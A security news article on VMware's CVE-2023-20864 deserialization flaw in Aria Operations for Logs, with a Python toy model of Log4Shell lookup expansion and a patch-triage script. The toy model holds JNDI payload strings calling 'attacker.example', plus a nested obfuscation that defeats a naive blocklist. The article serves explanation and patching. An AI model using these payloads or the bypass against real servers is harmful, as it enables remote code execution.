VMware patches break-and-enter hole in logging tools: update now! (Security News, April 2023)
The Log4Shell hole was a security flaw in the logging process itself. It boiled down to the fact that many logging systems let you embed what almost amount to "mini-programs" in the middle of the text you want to log, in order to make your logfiles "smarter" and easier to read. For example, if you asked Log4J to log the text I AM DUCK, Log4J would do just that; but if the text contained a lookup of the form ${jndi:ldap://host/name}, unpatched Log4J would try to resolve it, contacting a server chosen by whoever supplied the text, which is how a mere log line turned into remote code execution.
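To make the "mini-programs in the log text" idea concrete, here is an added illustration in Python. It is not Log4J's code and not code from the article: it is a toy logger that, like Log4j 2.x before the Log4Shell fixes, expands ${prefix:key} lookups found inside the message text it is asked to log, shown next to the hardened variant that does not. Only three lookup prefixes are modelled (env, lower and jndi); the prefix names match real Log4J lookups, but the class, function and host names are all assumptions made for the example, and the sample messages are constructed.

```python
import re

# Added illustration (not Log4j's own code): a toy logger that, like Log4j 2.x
# before the Log4Shell fixes, expands ${prefix:key} "lookups" found inside the
# message text it is asked to log, next to the hardened variant that does not.
# Only three lookup prefixes are modelled (env, lower, jndi); the prefix names
# match real Log4j lookups, everything else here is a simplification.

LOOKUP_RE = re.compile(r"\$\{([A-Za-z0-9]+):([^{}]*)\}")  # innermost ${prefix:key}
MAX_PASSES = 10  # bound on nested expansion so the model can never loop forever


class JndiLookupAttempt(Exception):
    """Raised at the point where real Log4j would contact a remote LDAP/RMI
    server named by the message text (the Log4Shell primitive, CVE-2021-44228)."""


def _resolve(prefix: str, key: str, env: dict) -> str:
    if prefix == "env":
        return env.get(key, "")
    if prefix == "lower":
        return key.lower()
    if prefix == "jndi":
        raise JndiLookupAttempt(f"would perform JNDI lookup of {key}")
    return "${" + prefix + ":" + key + "}"  # unknown prefix: left as it was


def expand_lookups(msg: str, env: dict) -> str:
    """Expand lookups repeatedly, innermost first, as a nested-lookup engine does."""
    for _ in range(MAX_PASSES):
        expanded = LOOKUP_RE.sub(lambda m: _resolve(m.group(1), m.group(2), env), msg)
        if expanded == msg:
            return expanded
        msg = expanded
    return msg


def log_vulnerable(msg: str, env: dict = None) -> str:
    """Pre-fix behaviour: untrusted message text is scanned for lookups and
    each one is evaluated, so whoever controls the text controls the lookups."""
    return "[app] " + expand_lookups(msg, env or {})


def log_hardened(msg: str, env: dict = None) -> str:
    """Post-fix behaviour (message lookups disabled, as in Log4j 2.16+ or with
    log4j2.formatMsgNoLookups=true on earlier 2.10+ builds): the message is
    emitted verbatim, so ${...} is just characters in a logfile."""
    return "[app] " + msg


def naive_blocklist(msg: str) -> str:
    """A tempting but insufficient mitigation: strip the literal '${jndi:'."""
    return msg.replace("${jndi:", "")


def triggers_jndi(msg: str, env: dict = None) -> bool:
    """True if logging msg with the vulnerable logger would reach a JNDI lookup."""
    try:
        log_vulnerable(msg, env)
    except JndiLookupAttempt:
        return True
    return False


if __name__ == "__main__":
    # Constructed sample messages, as an attacker-controlled field (say, a
    # User-Agent header) might deliver them to a server that logs it.
    print(log_vulnerable("I AM DUCK"))                            # logged as-is
    print(log_vulnerable("user=${env:USER}", {"USER": "alice"}))  # lookup expanded
    evil = "${jndi:ldap://attacker.example/a}"
    obfuscated = "${${lower:J}ndi:ldap://attacker.example/a}"
    print(triggers_jndi(evil), triggers_jndi(naive_blocklist(evil)))
    print(triggers_jndi(naive_blocklist(obfuscated)))             # blocklist bypassed
    print(log_hardened(obfuscated))                               # literal text only
```

The obfuscated message shows why string blocklists were a losing game during Log4Shell: nested lookups are expanded innermost first, so the text "${jndi:" never appears until the logger itself has produced it. The only reliable fix was to stop evaluating lookups in message text at all, which is what the hardened logger does.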
This time round, the logging-related bug we're warning you about is CVE-2023-20864, a deserialization-of-untrusted-data hole in VMware's Aria Operations for Logs product (the product formerly known as vRealize Log Insight).
The bad news is that VMware has given this bug a CVSS "security danger" score of 9.8/10, presumably because the flaw can be abused for what's known as remote code execution (RCE), even by network users who haven't logged into the Aria Operations for Logs (AOfL) system.
The good news in this case, as far as we can tell, is that the bug can't be triggered simply by abusing the logging process, i.e. by sending booby-trapped data to any server that just happens to keep logs: an attacker has to be able to reach the AOfL system itself.
That's less dramatic than Log4Shell, where the bug could, in theory at least, be triggered by network traffic sent to almost any server on the network that happened to make use of the Log4J logging code, including systems such as web servers that were supposed to be publicly accessible.
Affected versions apparently include VMware Aria Operations for Logs 8.10.2, which needs to be updated to 8.12, and VMware Cloud Foundation version 4.x, which bundles Aria Operations for Logs as one of its components and seems to need updating to Cloud Foundation 4.5 first, and then upgrading the bundled Aria Operations for Logs to 8.12.
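If you run more than a handful of these systems, the first job is to find out which ones are still below the fixed release. The Python below is an added example, not VMware's own tooling and not code from the article: it triages a constructed inventory against the upgrade paths given above (Aria Operations for Logs to 8.12; Cloud Foundation 4.x to 4.5 and then the bundled Aria Operations for Logs to 8.12). It treats any 8.x release below 8.12 as "not at the fixed level, check the advisory", which is an assumption that goes beyond the single affected version the article names, and it only compares version strings, so a hit is a reason to look, not proof of exploitability. Hostnames, product labels and the inventory itself are all made up for the example.

```python
from typing import List, Tuple

# Added example, not VMware's own tooling: triage an inventory of Aria
# Operations for Logs and Cloud Foundation instances against the version
# guidance in the advisory (8.x -> 8.12; Cloud Foundation 4.x -> 4.5, then the
# bundled Aria Operations for Logs -> 8.12). The inventory is constructed sample
# data. Assumption: any 8.x below 8.12 is treated as "not at the fixed level";
# that means "check the advisory", not proof of exploitability, and nothing
# here talks to the systems.

FIXED_AOFL = (8, 12)   # VMware Aria Operations for Logs fixed release
FIXED_VCF = (4, 5)     # VMware Cloud Foundation release to move to first

Row = Tuple[str, str, str]  # (hostname, product label, version string)


def parse_version(s: str) -> Tuple[int, ...]:
    """'8.10.2' -> (8, 10, 2): compare numerically, never as strings.
    (As text, '8.9' sorts after '8.12', which would hide an unpatched box.)"""
    return tuple(int(part) for part in s.strip().split("."))


def version_below(current: str, fixed: Tuple[int, ...]) -> bool:
    """True when current is older than the fixed release (8.12.0 counts as fixed)."""
    return parse_version(current) < fixed


def triage(inventory: List[Row]) -> List[Tuple[str, str]]:
    """Return (hostname, action) for each row; unrecognised products are flagged."""
    actions = []
    for host, product, version in inventory:
        if product == "aria-operations-for-logs":
            if version_below(version, FIXED_AOFL):
                action = f"NEEDS PATCH: upgrade Aria Operations for Logs {version} -> 8.12"
            else:
                action = f"ok: Aria Operations for Logs {version} is at or above 8.12"
        elif product == "cloud-foundation":
            if version_below(version, FIXED_VCF):
                action = (f"NEEDS PATCH: upgrade Cloud Foundation {version} -> 4.5, "
                          "then bundled Aria Operations for Logs -> 8.12")
            else:
                action = (f"CHECK: Cloud Foundation {version} is 4.5+; confirm the "
                          "bundled Aria Operations for Logs is at 8.12")
        else:
            action = f"REVIEW: unrecognised product '{product}'"
        actions.append((host, action))
    return actions


def needs_patch(inventory: List[Row]) -> List[str]:
    """Hostnames whose action starts with NEEDS PATCH, for a ticket or report."""
    return [host for host, action in triage(inventory) if action.startswith("NEEDS PATCH")]


SAMPLE_INVENTORY: List[Row] = [   # constructed sample data, not real hosts
    ("logs-01.corp.example", "aria-operations-for-logs", "8.10.2"),
    ("logs-02.corp.example", "aria-operations-for-logs", "8.12"),
    ("logs-03.corp.example", "aria-operations-for-logs", "8.9"),
    ("vcf-01.corp.example", "cloud-foundation", "4.4.1"),
    ("vcf-02.corp.example", "cloud-foundation", "4.5"),
    ("vcenter-01.corp.example", "vcenter", "8.0.1"),
]

if __name__ == "__main__":
    for host, action in triage(SAMPLE_INVENTORY):
        print(f"{host:28} {action}")
```

The numeric version tuple is the part worth copying: a grep-and-sort over version strings would place 8.9 after 8.12 and quietly drop an unpatched appliance from the list.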
Related Vulnerability
DATE | CVE | VULNERABILITY TITLE | RISK (CVSS score) |
---|---|---|---|
2023-04-20 | CVE-2023-20864 | Deserialization of Untrusted Data vulnerability in VMware Aria Operations for Logs and Cloud Foundation (VMware Aria Operations for Logs contains a deserialization vulnerability) | 9.8 |